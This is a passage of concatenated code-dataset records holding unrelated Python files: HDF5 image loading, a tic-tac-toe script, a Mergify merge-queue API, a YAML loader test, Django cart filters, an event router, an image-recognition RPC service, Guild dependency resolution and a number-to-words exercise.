files:\n            file_list.append(os.path.join(root, file))\n    \n    return file_list\n\n\ndef create_hdf5(path,classes,img_width,img_height):\n    file_name=\"{}.hdf5\".format(os.path.basename(path))\n    file_path=os.path.join(os.path.dirname(path), file_name)\n\n    if os.path.exists(file_path):\n        return file_path\n\n    addrs = get_files(path)\n\n    X_shape=(len(addrs),img_width,img_height)\n    Y_shape=(len(addrs),1)\n\n\n\n    with h5py.File(file_path, 'w') as hf:\n        hf.create_dataset(\"X\",X_shape,np.float64)  # np.float was removed from NumPy; use an explicit dtype\n        hf.create_dataset(\"Y\",Y_shape,np.uint8)\n\n        for i in range(X_shape[0]):\n            try:\n                im=mpimg.imread(addrs[i])\n                hf[\"X\"][i,...]=im\n\n                dir_name=os.path.basename(os.path.dirname(addrs[i]))\n                hf[\"Y\"][i]=classes.index(dir_name)\n            except:\n                pass \n\n    return file_path\n\ndef read_hdf5(path):\n    with h5py.File(path, 'r') as hf:\n        return np.array(hf[\"X\"]), 
np.array(hf[\"Y\"])","sub_path":"common/lab_common.py","file_name":"lab_common.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"227243441","text":"board = [['_','_','_'],\n ['_','_','_'],\n ['_','_','_']]\n\nsymbols = ['X', 'O']\nturn = 0\n\n# Prints the board\ndef print_board():\n for row in board:\n for col in row:\n print(col, end=' ')\n print()\n\n# Inserts a move at a given row & column\ndef make_move(row, col, symbol):\n board[row][col] = symbol\n\n# Returns true when the game is over \n# Note: Just a stub. Doesn't work yet\ndef is_game_over():\n return False\n\n# Alternates the turn between 0 and 1\ndef change_turn():\n global turn\n turn = (turn + 1) % 2\n\nwhile not is_game_over():\n # Print the board and whose turn it is\n print_board()\n print('Player {}'.format(turn+1))\n\n # Get the user input\n row_choice = int(input('Which row would you like to choose? '))\n col_choice = int(input('Which column would you like to choose? '))\n\n # Put their move on the board\n make_move(row_choice, col_choice, symbols[turn])\n\n # Next turn\n change_turn()","sub_path":"ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"42549094","text":"# -*- encoding: utf-8 -*-\n#\n# Copyright © 2021 Mergify SAS\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\nimport dataclasses\nimport datetime\nimport typing\n\nimport daiquiri\nimport fastapi\nimport pydantic\nfrom starlette.status import HTTP_204_NO_CONTENT\n\nfrom mergify_engine import context\nfrom mergify_engine import date\nfrom mergify_engine import github_types\nfrom mergify_engine import rules\nfrom mergify_engine import utils\nfrom mergify_engine.dashboard import application as application_mod\nfrom mergify_engine.queue import freeze\nfrom mergify_engine.queue import merge_train\nfrom mergify_engine.rules import get_mergify_config\nfrom mergify_engine.web import api\nfrom mergify_engine.web import redis\nfrom mergify_engine.web.api import security\n\n\nLOG = daiquiri.getLogger(__name__)\n\nrouter = fastapi.APIRouter(\n tags=[\"queues\"],\n dependencies=[\n fastapi.Depends(security.require_authentication),\n ],\n)\n\n\n@pydantic.dataclasses.dataclass\nclass Branch:\n name: github_types.GitHubRefType = dataclasses.field(\n metadata={\"description\": \"The name of the branch\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass SpeculativeCheckPullRequest:\n in_place: bool = dataclasses.field(\n metadata={\"description\": \"Whether the pull request has been checked in-place\"}\n )\n number: github_types.GitHubPullRequestNumber = dataclasses.field(\n metadata={\n \"description\": \"The number of the pull request used by the speculative check\"\n }\n )\n started_at: datetime.datetime = dataclasses.field(\n metadata={\n \"description\": \"The timestamp when the checks has started for this pull request\"\n }\n )\n ended_at: typing.Optional[datetime.datetime] = dataclasses.field(\n metadata={\n \"description\": \"The timestamp when the checks has ended for this pull request\"\n }\n )\n checks: typing.List[merge_train.QueueCheck] = dataclasses.field(\n metadata={\"description\": \"The list of pull request checks\"}\n )\n evaluated_conditions: typing.Optional[str] = dataclasses.field(\n metadata={\"description\": \"The queue rule conditions evaluation report\"}\n )\n state: merge_train.CheckStateT = dataclasses.field(\n metadata={\"description\": \"The global state of the checks\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueRule:\n name: rules.QueueName = dataclasses.field(\n metadata={\"description\": \"The name of the queue rule\"}\n )\n\n config: rules.QueueConfig = dataclasses.field(\n metadata={\"description\": \"The configuration of the queue rule\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass PullRequestQueued:\n number: github_types.GitHubPullRequestNumber = dataclasses.field(\n metadata={\"description\": \"The number of the pull request\"}\n )\n\n position: int = dataclasses.field(\n metadata={\"description\": \"The position of the pull request in the queue\"}\n )\n\n priority: int = dataclasses.field(\n metadata={\"description\": \"The priority of this pull request\"}\n )\n queue_rule: QueueRule = dataclasses.field(\n metadata={\"description\": \"The queue rule associated to this pull request\"}\n )\n\n queued_at: datetime.datetime = dataclasses.field(\n metadata={\n \"description\": \"The timestamp when the pull requested has entered in the queue\"\n }\n )\n speculative_check_pull_request: typing.Optional[SpeculativeCheckPullRequest]\n\n\n@pydantic.dataclasses.dataclass\nclass Queue:\n branch: Branch = dataclasses.field(\n metadata={\"description\": \"The branch of this queue\"}\n )\n\n pull_requests: typing.List[PullRequestQueued] = dataclasses.field(\n 
default_factory=list,\n metadata={\"description\": \"The pull requests in this queue\"},\n )\n\n\n@pydantic.dataclasses.dataclass\nclass Queues:\n queues: typing.List[Queue] = dataclasses.field(\n default_factory=list, metadata={\"description\": \"The queues of the repository\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueFreezePayload:\n reason: str = dataclasses.field(\n metadata={\"description\": \"The reason of the queue freeze\"}\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueFreeze:\n application_name: str = dataclasses.field(\n metadata={\"description\": \"Application name responsible for the freeze\"},\n )\n application_id: int = dataclasses.field(\n metadata={\"description\": \"Application ID responsible for the freeze\"},\n )\n name: str = dataclasses.field(\n default_factory=str, metadata={\"description\": \"Queue name\"}\n )\n reason: str = dataclasses.field(\n default_factory=str, metadata={\"description\": \"The reason of the queue freeze\"}\n )\n freeze_date: datetime.datetime = dataclasses.field(\n default_factory=date.utcnow,\n metadata={\"description\": \"The date and time of the freeze\"},\n )\n\n\n@pydantic.dataclasses.dataclass\nclass QueueFreezeResponse:\n queue_freezes: typing.List[QueueFreeze] = dataclasses.field(\n default_factory=list,\n metadata={\"description\": \"The frozen queues of the repository\"},\n )\n\n\n@router.get(\n \"/repos/{owner}/{repository}/queues\", # noqa: FS003\n summary=\"Get merge queues\",\n description=\"Get the list of pull requests queued in a merge queue of a repository\",\n response_model=Queues,\n responses={\n **api.default_responses, # type: ignore\n 404: {\"description\": \"Not found\"},\n 200: {\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"queues\": [\n {\n \"branch\": {\"name\": \"main\"},\n \"pull_requests\": [\n {\n \"number\": 5678,\n \"position\": 1,\n \"priority\": 100,\n \"queue_rule\": {\n \"name\": \"default\",\n \"config\": {\n \"priority\": 100,\n \"batch_size\": 1,\n \"batch_max_wait_time\": 0,\n \"speculative_checks\": 2,\n \"allow_inplace_checks\": True,\n \"disallow_checks_interruption_from_queues\": [],\n \"checks_timeout\": 60,\n \"draft_bot_account\": \"\",\n },\n },\n \"speculative_check_pull_request\": {\n \"in_place\": True,\n \"number\": 5678,\n \"started_at\": \"2021-10-14T14:19:12+00:00\",\n \"ended_at\": \"2021-10-14T15:00:42+00:00\",\n \"checks\": [],\n \"evaluated_conditions\": \"\",\n \"state\": \"success\",\n },\n \"queued_at\": \"2021-10-14T14:19:12+00:00\",\n },\n {\n \"number\": 4242,\n \"position\": 1,\n \"priority\": 100,\n \"queue_rule\": {\n \"name\": \"default\",\n \"config\": {\n \"priority\": 100,\n \"batch_size\": 1,\n \"batch_max_wait_time\": 0,\n \"speculative_checks\": 2,\n \"allow_inplace_checks\": True,\n \"disallow_checks_interruption_from_queues\": [],\n \"checks_timeout\": 60,\n \"draft_bot_account\": \"\",\n },\n },\n \"speculative_check_pull_request\": {\n \"in_place\": False,\n \"number\": 7899,\n \"started_at\": \"2021-10-14T14:19:12+00:00\",\n \"ended_at\": \"2021-10-14T15:00:42+00:00\",\n \"checks\": [],\n \"evaluated_conditions\": \"\",\n \"state\": \"success\",\n },\n \"queued_at\": \"2021-10-14T14:19:12+00:00\",\n },\n ],\n }\n ]\n }\n }\n }\n },\n },\n)\nasync def repository_queues(\n owner: github_types.GitHubLogin = fastapi.Path( # noqa: B008\n ..., description=\"The owner of the repository\"\n ),\n repository: github_types.GitHubRepositoryName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the repository\"\n ),\n 
redis_cache: utils.RedisCache = fastapi.Depends( # noqa: B008\n redis.get_redis_cache\n ),\n redis_queue: utils.RedisQueue = fastapi.Depends( # noqa: B008\n redis.get_redis_queue\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> Queues:\n queues = Queues()\n async for train in merge_train.Train.iter_trains(repository_ctxt):\n queue_rules = await train.get_queue_rules()\n if queue_rules is None:\n # The train is going the be deleted, so skip it.\n continue\n\n queue = Queue(Branch(train.ref))\n for position, (embarked_pull, car) in enumerate(train._iter_embarked_pulls()):\n if car is None:\n speculative_check_pull_request = None\n elif car.creation_state in [\"created\", \"updated\"]:\n if car.queue_pull_request_number is None:\n raise RuntimeError(\n f\"car state is {car.creation_state}, but queue_pull_request_number is None\"\n )\n speculative_check_pull_request = SpeculativeCheckPullRequest(\n in_place=car.creation_state == \"updated\",\n number=car.queue_pull_request_number,\n started_at=car.creation_date,\n ended_at=car.checks_ended_timestamp,\n state=car.checks_conclusion.value or \"pending\",\n checks=car.last_checks,\n evaluated_conditions=car.last_evaluated_conditions,\n )\n elif car.creation_state in (\"failed\", \"pending\"):\n speculative_check_pull_request = None\n else:\n raise RuntimeError(f\"Car creation state unknown: {car.creation_state}\")\n\n try:\n queue_rule = queue_rules[embarked_pull.config[\"name\"]]\n except KeyError:\n # This car is going to be deleted so skip it\n continue\n queue.pull_requests.append(\n PullRequestQueued(\n embarked_pull.user_pull_request_number,\n position,\n embarked_pull.config[\"priority\"],\n QueueRule(\n name=embarked_pull.config[\"name\"], config=queue_rule.config\n ),\n embarked_pull.queued_at,\n speculative_check_pull_request,\n )\n )\n\n queues.queues.append(queue)\n\n return queues\n\n\n@router.put(\n \"/repos/{owner}/{repository}/queue/{queue_name}/freeze\", # noqa: FS003\n summary=\"Freezes merge queue\",\n description=\"Freezes the merge of the requested queue and the queues following it\",\n response_model=QueueFreezeResponse,\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def create_queue_freeze(\n queue_freeze_payload: QueueFreezePayload,\n application: application_mod.Application = fastapi.Depends( # noqa: B008\n security.get_application\n ),\n queue_name: rules.QueueName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the queue\"\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> QueueFreezeResponse:\n\n if queue_freeze_payload.reason == \"\":\n queue_freeze_payload.reason = \"No freeze reason was specified.\"\n\n config_file = await repository_ctxt.get_mergify_config_file()\n if config_file is None:\n raise fastapi.HTTPException(\n status_code=404, detail=\"Mergify configuration file is missing.\"\n )\n\n config = get_mergify_config(config_file)\n queue_rules = config[\"queue_rules\"]\n if all(queue_name != rule.name for rule in queue_rules):\n raise fastapi.HTTPException(\n status_code=404, detail=f'The queue \"{queue_name}\" does not exists.'\n )\n\n qf = await freeze.QueueFreeze.get(repository_ctxt, queue_name)\n if qf is None:\n qf = freeze.QueueFreeze(\n repository=repository_ctxt,\n name=queue_name,\n reason=queue_freeze_payload.reason,\n application_name=application.name,\n application_id=application.id,\n 
freeze_date=date.utcnow(),\n )\n await qf.save()\n\n elif qf.reason != queue_freeze_payload.reason:\n qf.reason = queue_freeze_payload.reason\n await qf.save()\n\n return QueueFreezeResponse(\n queue_freezes=[\n QueueFreeze(\n name=qf.name,\n reason=qf.reason,\n application_name=qf.application_name,\n application_id=qf.application_id,\n freeze_date=qf.freeze_date,\n )\n ],\n )\n\n\n@router.delete(\n \"/repos/{owner}/{repository}/queue/{queue_name}/freeze\", # noqa: FS003\n summary=\"Unfreeze merge queue\",\n description=\"Unfreeze the specified merge queue\",\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def delete_queue_freeze(\n application: application_mod.Application = fastapi.Depends( # noqa: B008\n security.get_application\n ),\n queue_name: rules.QueueName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the queue\"\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> fastapi.Response:\n\n qf = freeze.QueueFreeze(\n repository=repository_ctxt,\n name=queue_name,\n application_name=application.name,\n application_id=application.id,\n )\n if not await qf.delete():\n raise fastapi.HTTPException(\n status_code=404,\n detail=f'The queue \"{queue_name}\" does not exists or is not currently frozen.',\n )\n\n return fastapi.Response(status_code=HTTP_204_NO_CONTENT)\n\n\n@router.get(\n \"/repos/{owner}/{repository}/queue/{queue_name}/freeze\", # noqa: FS003\n summary=\"Get queue freeze data\",\n description=\"Checks if the queue is frozen and get the queue freeze data\",\n response_model=QueueFreezeResponse,\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def get_queue_freeze(\n queue_name: rules.QueueName = fastapi.Path( # noqa: B008\n ..., description=\"The name of the queue\"\n ),\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> QueueFreezeResponse:\n\n qf = await freeze.QueueFreeze.get(repository_ctxt, queue_name)\n if qf is None:\n raise fastapi.HTTPException(\n status_code=404,\n detail=f'The queue \"{queue_name}\" does not exists or is not currently frozen.',\n )\n\n return QueueFreezeResponse(\n queue_freezes=[\n QueueFreeze(\n name=qf.name,\n reason=qf.reason,\n application_name=qf.application_name,\n application_id=qf.application_id,\n freeze_date=qf.freeze_date,\n )\n ],\n )\n\n\n@router.get(\n \"/repos/{owner}/{repository}/queues/freezes\", # noqa: FS003\n summary=\"Get the list of frozen queues\",\n description=\"Get the list of frozen queues inside the requested repository\",\n response_model=QueueFreezeResponse,\n dependencies=[fastapi.Depends(security.check_subscription_feature_queue_freeze)],\n)\nasync def get_list_queue_freeze(\n repository_ctxt: context.Repository = fastapi.Depends( # noqa: B008\n security.get_repository_context\n ),\n) -> QueueFreezeResponse:\n\n return QueueFreezeResponse(\n queue_freezes=[\n QueueFreeze(\n name=qf.name,\n reason=qf.reason,\n application_name=qf.application_name,\n application_id=qf.application_id,\n freeze_date=qf.freeze_date,\n )\n async for qf in freeze.QueueFreeze.get_all(repository_ctxt)\n ]\n )\n","sub_path":"mergify_engine/web/api/queues.py","file_name":"queues.py","file_ext":"py","file_size_in_byte":18321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"293062880","text":"\"\"\"Test Home Assistant yaml loader.\"\"\"\nimport io\nimport 
unittest\n\nfrom homeassistant.util import yaml\n\n\nclass TestYaml(unittest.TestCase):\n    \"\"\"Test util.yaml loader.\"\"\"\n\n    def test_simple_list(self):\n        \"\"\"Test simple list.\"\"\"\n        conf = \"config:\\n  - simple\\n  - list\"\n        with io.StringIO(conf) as f:\n            doc = yaml.yaml.safe_load(f)\n        assert doc['config'] == [\"simple\", \"list\"]\n\n    def test_simple_dict(self):\n        \"\"\"Test simple dict.\"\"\"\n        conf = \"key: value\"\n        with io.StringIO(conf) as f:\n            doc = yaml.yaml.safe_load(f)\n        assert doc['key'] == 'value'\n\n    def test_duplicate_key(self):\n        \"\"\"Test simple dict.\"\"\"\n        conf = \"key: thing1\\nkey: thing2\"\n        try:\n            with io.StringIO(conf) as f:\n                yaml.yaml.safe_load(f)\n        except Exception:\n            pass\n        else:\n            assert 0\n","sub_path":"tests/util/test_yaml.py","file_name":"test_yaml.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"1975179","text":"from django import template\n#decorator filter used\nregister = template.Library()\n\n#is the product in the cart or not?\n@register.filter(name='is_in_cart')\ndef is_in_cart(product,cart):\n    keys=cart.keys()\n    for id in keys:\n        if int(id) == product.id:\n            return True \n    \n    return False\n\n#add to cart quantity\n@register.filter(name='cart_quantity')\ndef cart_quantity(product,cart):\n    keys=cart.keys()\n    for id in keys:\n        if int(id) == product.id:\n            return cart.get(id)\n    \n    return 0\n\n#cart product price\n@register.filter(name='total_price')\ndef total_price(product,cart):\n    return product.price * cart_quantity(product,cart)\n\n#Total Cart Price Sum\n@register.filter(name='cart_total_price')\ndef cart_total_price(products,cart):\n    sum = 0\n    for p in products:\n        sum += total_price(p,cart)\n    return sum","sub_path":"store/templatetags/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"330762685","text":"import json\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), \".\", \"library\"))\nimport healthbot_event,fluentd_message,appformix_event\n \ndef identify(message):\n    try:\n        message = json.loads(message)\n        print(message)\n        if \"ident\" in message.keys() or \"value\" in message.keys():\n            application_name = \"fluentd\"\n        elif \"trigger\" in message.keys():\n            application_name = \"healthbot\"\n        elif \"kind\" in message.keys():\n            application_name = \"appformix\"\n        else:\n            application_name = \"default\"\n        print(\"application name:\" + application_name)\n        if application_name == \"healthbot\":\n            event = healthbot_event.HealthbotEvent(message)\n            #if event_type == \"app1\":\n        elif application_name == \"appformix\":\n            event = appformix_event.AppformixEvent(message)\n        elif application_name == \"fluentd\":\n            #check if it is fluentd jitter \n            if \"message\" in message.keys():\n                if \"jitter\" in message[\"message\"]:\n                    event = fluentd_message.FluentdMessageJitter(message)\n                else:\n                    event = fluentd_message.FluentdMessage(message)\n            #check if it is fluentd snmp trap\n            elif \"value\" in message.keys():\n                if \"SNMP\" in message[\"value\"]:\n                    event = fluentd_message.FluentdMessageSNMPTrap(message)\n                else:\n                    event = fluentd_message.FluentdMessage(message)\n        else:\n            event = message\n    except Exception as e:\n        print(\"invalid format\")\n        print(e)\n        event = message\n    return 
event\n\n","sub_path":"identify_event.py","file_name":"identify_event.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315731288","text":"import sys\nimport logging\n\nfrom aiohttp import web\nfrom jsonrpcserver.aio import methods\nfrom jsonrpcserver.exceptions import InvalidParams\n\nimport service.common\nimport service.image_recon as img_recon\nfrom service import flowers_map_names, dogs_map_names\n\nlogging.basicConfig(level=10, format=\"%(asctime)s - [%(levelname)8s] - %(name)s - %(message)s\")\nlog = logging.getLogger(\"img_recon_service\")\n\n\n@methods.add\nasync def version(**kwargs):\n log.debug(\"version()\")\n return {\"result\": \"v0.1\"}\n\n\n@methods.add\nasync def flowers(**kwargs):\n log.debug(\"flowers({})\".format(kwargs))\n model = kwargs.get(\"model\", \"ResNet18\")\n map_names = flowers_map_names\n img_path = kwargs.get(\"img_path\", None)\n if img_path is None:\n raise InvalidParams(\"\\\"img_path\\\" is required\")\n image_dims = (3, 224, 224)\n result = img_recon.image_recognition(\n \"flowers\", model, map_names, img_path, image_dims\n )\n return {\"result\": result}\n\n\n@methods.add\nasync def dogs(**kwargs):\n log.debug(\"dogs({})\".format(kwargs))\n model = kwargs.get(\"model\", \"ResNet18\")\n map_names = dogs_map_names\n img_path = kwargs.get(\"img_path\", None)\n if img_path is None:\n raise InvalidParams(\"\\\"img_path\\\" is required\")\n image_dims = (3, 224, 224)\n\n result = img_recon.image_recognition(\"dogs\", model, map_names, img_path, image_dims)\n return {\"result\": result}\n\n\n@methods.add\nasync def cars(**kwargs):\n log.debug(\"cars({})\".format(kwargs))\n return {\"result\": '\"cars\" Not Implemented yet!'}\n\n\nasync def json_rpc_handle(request):\n request = await request.text()\n response = await methods.dispatch(request, trim_log_values=True)\n if response.is_notification:\n return web.Response()\n else:\n return web.json_response(response, status=response.http_status)\n\n\nif __name__ == \"__main__\":\n parser = service.common.common_parser(__file__)\n args = parser.parse_args(sys.argv[1:])\n service.common.main_loop(json_rpc_handle, args)\n","sub_path":"Services/JSON-RPC/CNTK_ImageRecon/service/image_recon_service.py","file_name":"image_recon_service.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510886720","text":"# Copyright 2017 TensorHub, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport logging\nimport os\nimport re\n\nfrom guild import namespace\nfrom guild import resource\nfrom guild import util\nfrom guild.resolve import ResolutionError\n\nlog = logging.getLogger(\"core\")\n\nRESOURCE_TERM = r\"[a-zA-Z0-9_\\-\\.]+\"\n\nclass DependencyError(Exception):\n pass\n\nclass ResolutionContext(object):\n\n def __init__(self, target_dir, opdef):\n 
self.target_dir = target_dir\n self.opdef = opdef\n\nclass Resource(object):\n\n def __init__(self, resdef, ctx):\n self.resdef = resdef\n self.ctx = ctx\n\n def resolve(self):\n log.info(\"Resolving '%s' resource\", self.resdef.name)\n for source in self.resdef.sources:\n self._resolve_source(source)\n\n def _resolve_source(self, source):\n resolver = self.resdef.get_source_resolver(source)\n if not resolver:\n raise DependencyError(\n \"unsupported source '%s' in resource '%s'\"\n % (source, self.resdef.name))\n try:\n source_path = resolver.resolve()\n except ResolutionError as e:\n raise DependencyError(\n \"could not resolve '%s' in '%s' resource: %s\"\n % (source, self.resdef.name, e))\n else:\n self._verify_file(source_path, source.sha256)\n unpacked = self._maybe_unpack(source_path, source)\n to_link = [source_path] if unpacked is None else unpacked\n for path in to_link:\n self._link_to_source(path)\n\n def _verify_file(self, path, sha256):\n self._verify_file_exists(path)\n if sha256:\n self._verify_file_hash(path, sha256)\n\n def _verify_file_exists(self, path):\n if not os.path.exists(path):\n raise DependencyError(\n \"'%s' required by operation '%s' does not exist\"\n % (path, self.ctx.opdef.fullname))\n\n def _verify_file_hash(self, path, sha256):\n actual = util.file_sha256(path)\n if actual != sha256:\n raise DependencyError(\n \"'%s' required by operation '%s' has an unexpected sha256 \"\n \"(expected %s but got %s)\"\n % (path, self.ctx.opdef.fullname, sha256, actual))\n\n def _maybe_unpack(self, source_path, source):\n if not source.unpack:\n return None\n archive_type = self._archive_type(source_path, source)\n if not archive_type:\n return None\n return self._unpack(source_path, archive_type, source.prefix)\n\n @staticmethod\n def _archive_type(source_path, source):\n if source.type:\n return source.type\n parts = source_path.lower().split(\".\")\n if parts[-1] == \"zip\":\n return \"zip\"\n elif parts[-1] == \"tar\" or parts[-2:-1] == \"tar\":\n return \"tar\"\n else:\n return None\n\n def _unpack(self, source_path, type, prefix):\n if type == \"zip\":\n return self._unzip(source_path, prefix)\n elif type == \"tar\":\n return self._untar(source_path, prefix)\n else:\n raise DependencyError(\n \"'%s' required by operation '%s' cannot be unpacked \"\n \"(unsupported archive type '%s')\"\n % (source_path, self.ctx.opdef.fullname, type))\n\n def _unzip(self, source_path, prefix):\n import zipfile\n zf = zipfile.ZipFile(source_path)\n return self._gen_unpack(\n os.path.dirname(source_path), zf.namelist, zf.extractall, prefix)\n\n def _untar(self, source_path, prefix):\n import tarfile\n tf = tarfile.TarFile(source_path)\n return self._gen_unpack(\n os.path.dirname(source_path), tf.getnames, tf.extractall, prefix)\n\n def _gen_unpack(self, dest, list_files, extract_all, prefix):\n files = list_files()\n to_extract = [\n name for name in files\n if not os.path.exists(os.path.join(dest, name))\n ]\n extract_all(dest, to_extract)\n if prefix:\n return self._prefixed_source_paths(dest, files, prefix)\n else:\n return self._all_source_paths(dest, files)\n\n @staticmethod\n def _prefixed_source_paths(dest, files, prefix):\n prefixed = [\n name[len(prefix):] for name in files\n if name.startswith(prefix)\n ]\n root_names = [name.split(\"/\")[0] for name in prefixed]\n return [\n os.path.join(dest, prefix + name) for name in set(root_names)\n ]\n\n @staticmethod\n def _all_source_paths(dest, files):\n root_names = [name.split(\"/\")[0] for name in files]\n return 
[os.path.join(dest, name) for name in set(root_names)]\n\n def _link_to_source(self, source_path):\n link = self._link_path(source_path)\n if os.path.exists(link):\n log.warning(\"source '%s' already exists, skipping link\", link)\n return\n util.ensure_dir(os.path.dirname(link))\n log.debug(\"resolving source '%s' as link '%s'\", source_path, link)\n os.symlink(source_path, link)\n\n def _link_path(self, source_path):\n basename = os.path.basename(source_path)\n res_path = self.resdef.path or \"\"\n if os.path.isabs(res_path):\n raise DependencyError(\n \"invalid path '%s' in resource '%s' (path must be relative)\"\n % (res_path, self.resdef.name))\n return os.path.join(self.ctx.target_dir, res_path, basename)\n\ndef _dep_desc(dep):\n return \"%s:%s\" % (dep.opdef.modeldef.name, dep.opdef.name)\n\ndef resolve(dependencies, ctx):\n for dep in dependencies:\n resource = _dependency_resource(dep.spec, ctx)\n resource.resolve()\n\ndef _dependency_resource(spec, ctx):\n res = util.find_apply(\n [_model_resource,\n _modelfile_resource,\n _packaged_resource],\n spec, ctx)\n if res:\n return res\n raise DependencyError(\n \"invalid dependency '%s' in operation '%s'\"\n % (spec, ctx.opdef.fullname))\n\ndef _model_resource(spec, ctx):\n m = re.match(r\"(%s)$\" % RESOURCE_TERM, spec)\n if m is None:\n return None\n res_name = m.group(1)\n return _modeldef_resource(ctx.opdef.modeldef, res_name, ctx)\n\ndef _modeldef_resource(modeldef, res_name, ctx):\n resdef = modeldef.get_resource(res_name)\n if resdef is None:\n raise DependencyError(\n \"resource '%s' required by operation '%s' is not defined\"\n % (res_name, ctx.opdef.fullname))\n return Resource(resdef, ctx)\n\ndef _modelfile_resource(spec, ctx):\n m = re.match(r\"(%s):(%s)$\" % (RESOURCE_TERM, RESOURCE_TERM), spec)\n if m is None:\n return None\n model_name = m.group(1)\n modeldef = ctx.opdef.modelfile.get(model_name)\n if modeldef is None:\n raise DependencyError(\n \"model in resource '%s' required by operation \"\n \"'%s' is not defined\"\n % (spec, ctx.opdef.fullname))\n res_name = m.group(2)\n return _modeldef_resource(modeldef, res_name, ctx)\n\ndef _packaged_resource(spec, ctx):\n m = re.match(r\"(%s)/(%s)$\" % (RESOURCE_TERM, RESOURCE_TERM), spec)\n if m is None:\n return None\n pkg_name = m.group(1)\n res_name = m.group(2)\n try:\n resources = list(resource.for_name(res_name))\n except LookupError:\n pass\n else:\n for res in resources:\n if namespace.apply_namespace(res.dist.project_name) == pkg_name:\n return Resource(res.resdef, ctx)\n raise DependencyError(\n \"resource '%s' required by operation '%s' is not installed\"\n % (spec, ctx.opdef.fullname))\n","sub_path":"guild/deps.py","file_name":"deps.py","file_ext":"py","file_size_in_byte":8248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"581828644","text":"FIRST_TEN = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\",\n \"eight\", \"nine\"]\nSECOND_TEN = [\"ten\", \"eleven\", \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\",\n \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\"]\nOTHER_TENS = [\"twenty\", \"thirty\", \"forty\", \"fifty\", \"sixty\", \"seventy\",\n \"eighty\", \"ninety\"]\nHUNDRED = \"hundred\"\n\n\ndef checkio(number):\n\n def digit(number):\n return FIRST_TEN[int(number)]\n\n def double_digit(number):\n fd, sd = number\n if fd == '1':\n return SECOND_TEN[int(sd)]\n\n tens = OTHER_TENS[int(fd) - 2]\n\n if sd == '0':\n return tens\n\n return '%s %s' % (tens, digit(sd))\n\n 
def three_digit(number):\n        h, fd, sd = number\n\n        hundreds = '%s %s' % (digit(h), HUNDRED)\n\n        if fd == '0' and sd == '0':\n            return hundreds\n\n        if fd == '0':\n            return '%s %s' % (hundreds, digit(sd))\n\n        return '%s %s' % (hundreds, double_digit(number[1:]))\n\n    cnum = '%d' % number\n    s = len(cnum)\n    ret = ''\n\n    if s == 1:\n        ret = digit(cnum)\n    elif s == 2:\n        ret = double_digit(cnum)\n    elif s == 3:\n        ret = three_digit(cnum)\n    return ret\n\n#Some hints\n#Don't forget to strip whitespace at the end of the string\n\n\n#These \"asserts\" are used only for self-checking and are not necessary for auto-testing\nif __name__ == '__main__':\n    assert checkio(4) == 'four', \"1st example\"\n    assert checkio(133) == 'one hundred thirty three', \"2nd example\"\n    assert checkio(12) == 'twelve', \"3rd example\"\n    assert checkio(101) == 'one hundred one', \"4th example\"\n    assert checkio(212) == 'two hundred twelve', \"5th example\"\n    assert checkio(40) == 'forty', \"6th example\"\n    assert checkio(88) == 'eighty eight', \"7th example\"\n    assert checkio(20) == 'twenty', \"8th example\"\n    assert checkio(100) == 'one hundred', \"9th example\"\n    assert checkio(940) == 'nine hundred forty', \"10th 